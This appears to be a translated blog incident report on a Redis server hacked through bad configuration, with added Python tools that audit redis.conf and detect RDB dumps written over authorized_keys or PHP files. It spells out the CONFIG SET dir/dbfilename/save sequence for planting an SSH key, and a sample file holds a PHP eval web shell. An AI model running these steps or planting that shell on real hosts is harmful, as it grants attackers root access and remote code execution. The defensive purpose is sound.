Recently, during routine security checks on the company's business cloud hosts, the security team found an anomalous Redis server. The symptoms were as follows:
1. The shell history and the /var/log directory had been emptied;
2. Abnormal network traffic;
3. A malicious high-privileged user named Beef-xbdb had been added with uid 0 and home directory /root, i.e. bound to the root account's identity;
4. A Trojan file named Gakzigdpzp in the /boot directory;
5. That Trojan in /boot had network connections in the SYN_SENT state to 192.225.230.143, an IP address in Hong Kong;
6. Trojan/backdoor files in multiple directories:
......
It later turned out that the intrusion was caused by an improper Redis configuration:
1. The Redis service was started as root;
2. The Redis machine had a public network address;
3. Redis accepted connections from any address (the default "bind 127.0.0.1" line was commented out);
4. Redis required no password (the default "requirepass foobared" line is also commented out).
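As an added example (not code from the original post), here is a small audit script for the configuration conditions above. The two sample redis.conf fragments are constructed, and the password and rename-command values in the hardened sample are placeholders. Beyond the post's three config items it also flags protected-mode, which Redis 3.2 and later use to refuse non-loopback clients when neither bind nor requirepass is set, and whether the CONFIG command has been renamed away, since CONFIG SET is the primitive the attack relies on. Running as root is a process property rather than a config line, so it is checked separately.

```python
"""Audit a redis.conf for the misconfigurations listed above.

Added example, not code from the original post. The two sample configs
are constructed; the password and rename-command values in HARDENED_CONF
are placeholders (assumptions), not values from the post.
"""
import os

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_redis_conf(text):
    """Map each active directive to the list of its values, in file order.

    Comment lines (the shipped '# bind 127.0.0.1' and '# requirepass foobared')
    are skipped exactly as redis-server skips them, so a commented-out
    directive is the same as an absent one.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Listening address. No 'bind' at all means every interface.
    #    Redis 6+ accepts an optional '-' prefix ("bind 127.0.0.1 -::1").
    binds = conf.get("bind", [""])[-1].split()
    addrs = {a.lstrip("-") for a in binds}
    if not addrs:
        findings.append("bind: no bind directive, Redis listens on all interfaces")
    elif addrs - LOOPBACK:
        findings.append("bind: listens on non-loopback address(es) %s" % sorted(addrs - LOOPBACK))

    # 2. Authentication. Absent/empty requirepass means anyone can talk to it;
    #    'foobared' is the well-known value from the shipped sample config.
    password = conf.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append("requirepass: not set, unauthenticated access")
    elif password == "foobared" or len(password) < 16:
        findings.append("requirepass: weak or default password")

    # 3. protected-mode (Redis >= 3.2) refuses non-loopback clients when
    #    neither bind nor requirepass is set; older servers lack it entirely.
    mode = conf.get("protected-mode", ["unset"])[-1].lower()
    if mode == "no":
        findings.append("protected-mode: explicitly disabled")
    elif mode == "unset":
        findings.append("protected-mode: not set (defaults to yes only on Redis >= 3.2)")

    # 4. The attack depends on CONFIG SET dir/dbfilename. Renaming CONFIG
    #    to "" removes that primitive from every client.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append('rename-command: CONFIG still reachable (consider rename-command CONFIG "")')

    return findings


def running_as_root():
    """Condition 1 is a process property: check the effective uid of the
    process this function runs in (e.g. call it from a check run on the host)."""
    geteuid = getattr(os, "geteuid", None)
    return geteuid is not None and geteuid() == 0


# Constructed sample: the state described in the post (defaults commented out).
WEAK_CONF = """
port 6379
# bind 127.0.0.1
# requirepass foobared
dir /var/lib/redis
"""

# Constructed sample of corrected settings (password is a placeholder).
HARDENED_CONF = """
port 6379
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["no findings"])
    print("running as root:", running_as_root())
```

The parser keeps every occurrence of a directive because redis-server applies the last one, so a hardened "bind 127.0.0.1" that is later overridden by "bind 0.0.0.0" further down the file is still reported.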
With those conditions in place, the disaster followed:
Once port 6379 is found by a scan, the attacker only needs to store their own SSH public key in a Redis key and then run three commands: config set dir /root/.ssh, config set dbfilename "authorized_keys", save. Redis then writes its database dump, which contains the public key, to /root/.ssh/authorized_keys; sshd ignores the lines it cannot parse and accepts the key, so from that point on the attacker has full root access to the machine over SSH.
A web search showed that this is a classic Redis security problem, and there is a detailed analysis report at:
Https://nosec.org/bobao/redis_crackit?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io
Even when Redis is not started as root there is still a risk: for example, if the dump is written as a PHP file into Apache's /var/www/html directory with PHP code stored in a key, requesting that page from the web gives the attacker a web shell.
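Both write primitives described above (the dump written as /root/.ssh/authorized_keys, and the dump written as a PHP file under /var/www/html) leave the same trace on disk: a text file that begins with the RDB magic "REDIS" plus a four-digit version, followed by binary and the attacker's payload on its own line. As an added example (not code from the original post), the following script detects that trace and extracts the payload; the three sample files are constructed, their RDB bodies only imitate the real layout, and the key material and hostnames in them are placeholders.

```python
"""Detect Redis RDB dumps written over text files (authorized_keys, .php).

Added example, not code from the original post. The sample files below
are constructed; their RDB bodies only imitate the real layout, and the key
material and hostnames are placeholders.
"""
import re

RDB_MAGIC = b"REDIS"   # every RDB file starts with "REDIS" + 4-digit version
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{20,}")   # 'strings'-style extraction
SSH_KEY = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/=]+(?: \S+)?")
PHP_TAG = re.compile(r"<\?php.*?(?:\?>|$)", re.S)


def scan_rdb_overwrite(data):
    """Classify a file that should be text but begins with an RDB header.

    Returns None when the data does not start with the RDB magic; otherwise a
    dict with the RDB version, every SSH public key and PHP fragment found in
    the printable runs, and all printable runs (which also show the key names
    the attacker used).
    """
    if not data.startswith(RDB_MAGIC):
        return None
    version = data[len(RDB_MAGIC):len(RDB_MAGIC) + 4].decode("ascii", "replace")
    runs = [r.decode("ascii") for r in PRINTABLE_RUN.findall(data)]
    keys = [m.group(0) for r in runs for m in SSH_KEY.finditer(r)]
    php = [m.group(0) for r in runs for m in PHP_TAG.finditer(r)]
    return {"rdb_version": version, "ssh_keys": keys, "php": php, "strings": runs}


def authorized_keys_junk_lines(data):
    """Lines of an authorized_keys file that sshd would silently skip.

    sshd ignores blank lines, '#' comments and anything it cannot parse as
    '[options] keytype base64 [comment]'. The skipped junk is exactly what a
    dumped RDB leaves around the injected key, so a non-empty result
    deserves a look even when the file no longer starts with the magic.
    """
    junk = []
    for raw in data.split(b"\n"):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        try:
            text = line.decode("ascii")
        except UnicodeDecodeError:
            junk.append(raw)
            continue
        if not SSH_KEY.search(text):
            junk.append(raw)
    return junk


# Constructed: /root/.ssh/authorized_keys after the attack. Layout imitates an
# RDB dump (magic, binary type/length bytes, padded key value, EOF opcode 0xff,
# 8-byte checksum); the key itself is a placeholder.
DUMPED_AUTHORIZED_KEYS = (
    b"REDIS0006\xfe\x00\x00\x07crackit\xc0"
    b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7placeholderkeymaterial0123456789 attacker@evil\n\n"
    b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
)

# Constructed: the PHP variant written into /var/www/html.
DUMPED_PHP = (
    b"REDIS0006\xfe\x00\x00\x01x\xc0"
    b"\n\n<?php @eval($_POST['cmd']); ?>\n\n"
    b"\xff\x00\x00\x00\x00\x00\x00\x00\x00"
)

# Constructed: a legitimate authorized_keys file for comparison.
CLEAN_AUTHORIZED_KEYS = (
    b"# admin workstation\n"
    b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyMaterial000000000 admin@ops\n"
)

if __name__ == "__main__":
    for name, blob in (("authorized_keys", DUMPED_AUTHORIZED_KEYS),
                       ("shell.php", DUMPED_PHP),
                       ("clean authorized_keys", CLEAN_AUTHORIZED_KEYS)):
        print(name, scan_rdb_overwrite(blob))
    print("junk lines:", authorized_keys_junk_lines(DUMPED_AUTHORIZED_KEYS))
```

In practice the same scan can be pointed at every authorized_keys file under /root and /home and at the web root; a file that starts with "REDIS" in either place is a direct indicator of this attack, and the extracted key comment or PHP fragment is what to pivot on in the rest of the investigation.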
This article is from the "Memory Fragment" blog; reprinting is declined.
Improper Redis configuration causes the machine to be hacked